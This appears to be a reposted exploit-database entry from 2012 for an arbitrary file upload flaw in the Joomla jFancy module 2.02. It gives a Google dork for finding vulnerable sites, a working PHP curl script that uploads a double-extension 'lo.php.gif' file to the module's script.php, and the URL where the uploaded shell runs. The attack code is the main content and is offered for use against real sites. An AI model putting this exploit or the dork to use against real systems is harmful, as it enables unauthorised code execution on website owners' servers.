##################################################
# Description : Joomla Modules - jFancy Arbitrary File Upload Vulnerability
# Version : 2.02
# Link : http://www.joomlaproduction.com/index.php/Modules/jFancy/flypage.tpl.html
# Plugins : register for download
# Google Dork : inurl:/modules/mod_jfancy/
# Site : 1337day.com Inj3ct0r Exploit Database
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
##################################################
Exploit :
PostShell.php
<?php
$uploadfile="lo.php.gif";
$ch = curl_init("http://www.exemple.com/modules/mod_jfancy/script.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('photoupload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://www.exemple.com/images/lo.php.gif
lo.php.gif
<?php
phpinfo();
?>
# 1337day.com [2012-06-09]
Socializer Widget By Blogger Yard
Related Posts:
Hacking
0 comments:
Post a Comment